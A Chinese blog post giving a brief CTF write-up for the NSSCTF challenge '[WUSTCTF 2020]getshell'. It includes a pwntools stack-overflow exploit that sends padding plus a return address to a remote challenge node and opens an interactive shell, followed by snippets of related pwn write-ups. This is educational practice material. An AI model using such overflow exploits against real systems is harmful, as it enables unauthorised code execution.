NSSCTF(PWN)6

最新推荐文章于 2024-11-08 14:34:47 发布
最新推荐文章于 2024-11-08 14:34:47 发布
阅读量155 收藏
点赞数 2
文章标签: linux ubuntu python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142673827
版权

[WUSTCTF 2020]getshell

查看发现是32位文件

进入main发现vulnerable()双击进入

单纯的典型栈溢出

发现了system和binsh

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20261')
main = 0x804851b
padding = b'a'*(0x18+0x4)
payload = padding + p32(main)
io.sendline(payload)
io.interactive()

题目虽然很简单,但是flag有点难找。flag在root下的ctf里面

感冒了今天偷个小懒........

樊少泽
关注
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 788
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1777
这不是欺负老实人嘛~
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3586
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF(PWN)
fanshaoze的博客
09-28 388
题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag。
NSSCTF(PWN)5
fanshaoze的博客
09-30 437
使用checksec知道是64位文件发现print_flag我们双击进入发现flag藏在这里面,我们回头去看if(v5)的条件,知道我们V5不能为0,这里涉及了栈溢出这个是我们要溢出的栈,直接b'a'*(0x1F+0x8)还有一种方法直接nc然后输入大量字符。
NSSCTF(PWN)15
fanshaoze的博客
10-24 505
发现是64位文件进入vuln发现read典型栈溢出发现这里有system和binsh知道了后门地址。
NSSCTF(PWN)8
fanshaoze的博客
10-07 451
是32位文件main函数里发现了dofunc双击进入发现了read这里涉及了典型的栈溢出发现没有binsh只有system,我们可以把之前找到的buf双击点开发现bss当做binsh用,这题涉及到了shellcode注意这题的system里没有binsh要我们自己搭建一个binsh框架。
NSSCTF(PWN)3
fanshaoze的博客
09-29 427
这是一道简单的nc签到题,直接终端nc就行。
NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1
qq_45692883的博客
01-19 561
我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可。这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节。使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变。gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容。差不多就是这里: 0x4006be。知道了这些后,开始写exp。
nssctf pwn
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如...
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1991
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[BUUCTF]Pwn刷题记录
x0r
10-13 266
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 145
PWN 要点
【ctf】 关于确定靶机上的libc版本
qq_31808893的博客
02-07 472
记录一下经验,有时候通过泄露的单一地址 如 puts printf 等用工具查或者手动查会查出很多libc版本,一个个试是一种办法,不过有一种方法可以更精确确定libc版本。
linux长时间运行任务中断报警trap
最新发布
djl的专栏,blog.djl.cx好记
11-08 189
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
Linux下的systemd/service
zxz_Fine的博客
11-05 568
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 578
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 291
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux kernel 源码下载与源码在线阅读地址及其相关资源网站
代码背包客的博客
11-06 395
Linux内核源码的下载地址和在线阅读方式有多种,下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站,供大家参考学习!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值